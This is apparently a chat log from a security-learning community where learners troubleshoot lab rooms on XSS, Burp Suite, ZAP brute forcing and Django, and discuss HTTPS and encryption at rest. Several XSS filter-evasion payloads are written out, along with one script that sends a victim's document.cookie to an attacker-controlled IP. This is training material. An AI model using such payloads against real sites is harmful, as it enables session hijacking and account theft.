Alright, I just finished the XSS room using another approach but I still think it should have worked the 1-st time.
In the Django room, Task 3
Anybody got a quick fix for the ModuleNotFoundError after changing the url.py ? this is the example snippet
had to add "include" to the import up top, I'm also in the main project folder
you should have a urls.py in the apps folder but yea i have cross-referenced it with the github report at task 4
I returned today after some days to finish my path and I've discovered that I have to do again Burp Suite but this time in many rooms 
Trying to finish the ZAP room but the bruteforce task does not seem to work with any of the passwords from the fasttrack wordlist as is mentioned
tried with the usual hydra method as well and it gave the same result
any ideas as to what is wrong?
also the example images says "security=low" but the one I am getting is "security=impossible" and I cannot change it
Change the security setting in the webapp otherwise it won't work
Room tells you to do that earlier on
don't know if this is the right room... can someone explain the difference between dirbuster and gobuster - dont they essentially just do the same thing (brute-force URLs directories/files)
-mute @elder goblet Spamming self promotion over every channel
Muted WhiteDevil#5157 for 1 day
Stuck on a ques ... Anyone can help me out .. it is smh .. i am burp suite repeater on task 7 ... How to get a 500 internal server error
What payloads have you tried?
Thank you .. but its done .. i literally used all ASCII characters for that 500 error but its done at the end
Gave +1 Rep to @strange radish
Glad to know
Hi, I'm confused about ECC encryption, I just can't find answers online.
Do I need to encrypt data manually or should I use HTTPS instead?
I'm using PHP back-end anyway, because it's on the requirements.
I'm assuming you're building some kind of website? If so you should just use HTTPS, get a free cert from lets encrypt, set some sensible TLS configuration and you're done https://certbot.eff.org/ and https://ssl-config.mozilla.org/ should have all you need
if you wanna know more about ECC cloudflare has a pretty good primer: https://blog.cloudflare.com/a-relatively-easy-to-understand-primer-on-elliptic-curve-cryptography/
Thanks, it's much secure than encrypting it by myself, right?
I'm just going to share my stack.
The website that I'm building is build using JavaScript Framework, so it'll just consume PHP REST API.
Gave +1 Rep to @tawny lantern
yes, crypto is very hard to get right on your own. If you can, you should avoid at all costs trying to roll your own.
The stack is totally fine, since you're running a webserver which has to serve the content to the clients. That webserver does all the heavy lifting for you, the javascript/php stuff doesn't really interact with HTTPS at all
Thank you sir tan.
Do I need to encrypt all the data before saving it to a relational database?
I read one research that they encrypt data using RSA before saving it to the database.
that's another can of worms altogether. HTTPS is encryption at transport, while storing something in a db would be encryption at rest (the data isn't moving around but stays in the database), for which you usually use a symmetric cipher (like AES) because it's faster. But I don't really know enough to give advice. From what I can tell the DBMS usually have encryption built in, e.g. MySQL https://dev.mysql.com/doc/refman/8.0/en/innodb-data-encryption.html
Thank you again sir tan. I'm going to check all of that resources that you've sent. Thank you.
Gave +1 Rep to @tawny lantern
The phrase you're looking for is encryption at rest
HTTPS does encryption in transit for you
how can I get help with one room? the question from "How websites work" is not according with the video?
@tawny lantern and @orchid hazel . Seems like It requires me to use ECC both client and server. I already got a library in Javascript that can handle generation of public/private and calculation of shared key.
But I can't find library for PHP that can do the same.
Transport Layer Security (TLS), the successor of the now-deprecated Secure Sockets Layer (SSL), is a cryptographic protocol designed to provide communications security over a computer network. The protocol is widely used in applications such as email, instant messaging, and voice over IP, but its use as the Security layer in HTTPS remains the mo...
Just use TLS with HTTPS
That's also my solution, but it seems like they are requiring me to set it up manually.
My profs, oh sorry did I message the wrong channel?
libsodium has a php binding: https://github.com/jedisct1/libsodium-php which should have support for ECC
@tawny lantern @broken canyon Try #programming
Thanks sir @tawny lantern and sir @orchid hazel .
Gave +1 Rep to @tawny lantern
for someone taking this path to get into bug bounty/application security engineer, should I be learning web dev as well?
To get a better understanding?
and i guess the same question but for mobile testing as well
I am a bit of a newbie in the IT security field, and while i try to go through the web fundamentals path i seem to have problems with the burp suite app. I try to run it on my personal Kali machine, though i can't open it. I don't get errors or any other problem, it just doesn't respond. Anyone else who have had the same issue and could give me a hand?
What permissions are you running it under
Root?
I'm just trying to open the desktop application. So I guess it's a regular user
Huh
You try to run ps aux to see if anything is running when you attempt to open it? Like when you try to execute it does your cursor show that it's loading but it's not?
It doesn't show that it is loading. I can try to run top or ps aux to see if anything is running
I created a new VM and it somehow worked. Seems like there is some sort of bug in my other machine which doesn't allow me to run Burp Suite
Interesting
I'm glad to hear it's better now!
Next time something like that happens you can go to the burpsuite site and try to use their install script to update to the latest. It might repair whatever was going wrong.
Is there any benefit to using OWASP ZAP over GoBuster to find hidden browser paths?
In Filter Evasion Challenge 3 where Hello is filtered, I used <img src="" onerror="alert(String.fromCharCode(72, 101, 108, 108, 111))"> and got alert Hello but there is no flag received after it.
Again for challenge 4 <img src=q onclick="alert(String.fromCharCode(72, 101, 108, 108, 111))"> this payload prompts Hello
But I didn't receive any flag
@elder goblet No
Any help with burp suite repeater
You should just ask your question to what you need help with directly, if someone has an answer and is willing to help you will get a reply.
Ok
Burp suite: repeater task 8
Can you explain what you are having trouble with using Repeater?
Okay, but like I already said, please ask your question directly. Since yet you haven't explained what your issue is or asked a question regarding the issue you have?
See if you can get the server to error out with a "500 Internal Server Error" code by changing the number at the end of the request to extreme inputs.
What is the flag you receive when you cause a 500 error in the endpoint?
This is the question
Task 7 challenge
Okay, previously you said task 8? But did you read the hint on that question of task 7? Also please supply an example of an extreme input you tried, so the full url.
IDOR + neg value = flag
is my hint
Thanks but already have my answer
Gave +1 Rep to @misty shadow
all good then?
hi i need some clarification on why this payload does not work and causes the website redirecting me and causing the browser to load the website
<script>window.location='http://<my-machine-ip>/cookie='+document.cookie</script>
while this one works just fine:
<img src="javascript:'/logs/'+window.cookie">
Thank you
hey everyone. im wondering if someone could help me out. im on task3 of intro to django
i followed the instructions but i was a whole bunch of python errors when i run python3 manage.py migrate
You might want to verify in order to be able to send screenshots, so it's easier to help if people can see the errors.
!docs verify
Hi, can someone explain to me why this payload is not working on evading filters in XSS question three
<img src="j" onmouseover=window.confirm("Hell"+"o") />
when i run this it provides a popup saying hello but i dont get the flag
i was looking at a writeup which said this would work but also didnt work
<img src="j" onmouseover=window.confirm('HHelloello') />
Hi Hamu,
Your payload indeed works. The problem is that the check on the server side seems to be only giving the flag for payloads with alert.
Try <img src="j" onmouseover=alert("Hell"+"o") /> and it should give you the flag.
Just ask your query
